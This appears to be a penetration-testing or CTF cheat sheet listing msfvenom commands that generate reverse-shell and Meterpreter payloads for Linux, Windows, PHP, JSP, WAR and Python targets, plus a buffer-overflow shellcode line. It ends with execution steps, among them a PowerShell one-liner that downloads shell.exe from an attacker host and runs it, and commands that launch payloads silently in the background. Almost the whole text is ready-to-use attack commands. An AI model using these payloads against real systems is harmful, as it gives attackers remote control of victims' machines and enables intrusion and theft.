Note: Always remember to use the same payload in msfconsole as you used to generate in msfvenom.
Linux Reverse Shell (extension doesn’t matter for Linux)
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f elf -o shell.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f elf -o shell.elf
Payload Type: Shell Reverse TCP Suitable for: Linux systems, Netcat listener required.
Windows x64 Reverse Shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f exe -o shell.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f exe -o shell.exe
Payload Type: Windows x64 Meterpreter Reverse TCP Suitable for: 64-bit Windows systems, spawns a Meterpreter session.
PHP Reverse Shell
msfvenom -p php/reverse_php LHOST=10.10.10.10 LPORT=9001 -o shell.php
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f raw -o shell.php
Payload Type: PHP Meterpreter Reverse TCP Suitable for: PHP web servers, establishes a Meterpreter session.
JSP Reverse Shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f jsp -o ./rev.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f raw -o shell.jsp
Payload Type: JSP Shell Reverse TCP Suitable for: Java web servers, creates a JSP shell for reverse shell connection.
WAR Reverse Shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.56 LPORT=9001 -f war -o shell.war
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f war -o shell.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f war -o shell.war
Payload Type: WAR Shell Reverse TCP Troubleshooting: If the shell won’t execute then open that shell.war zip file and copy .jsp file name i.e, mtsoppesuz.jsp and visit manually something like shell/mtsoppesuz.jsp
Python Reverse Shell
msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=9001 -f raw -o shell.py
Payload Type: Python Reverse Shell Suitable for: Python environments, creates a Python script for reverse shell connection.
Buffer Overflow (BoF) Payload
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '' -f python -v notBuf -o shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f python -o shell.py
Payload Type: Python Reverse TCP Shell (for Buffer Overflow) Suitable for: Exploiting buffer overflow vulnerabilities in Windows systems.
Executing the Reverse Shell
PowerShell Execution (for Windows)
powershell "iwr -Uri http://attacker.ip:8000/shell.exe -OutFile C:/Windows/Temp/shell.exe; C:/Windows/Temp/shell.exe"
Note: Use PowerShell to download and execute the generated executable file on the target Windows system.
Command Prompt (cmd) Execution (for Windows)
start /b shell.exe
Note: Use Command Prompt to execute the generated executable file silently in the background on the target Windows system.
Bash Execution (for Linux)
chmod +x shell && ./shell &
Note: Use Bash shell to set execute permission and run the generated ELF binary in the background on the target Linux system.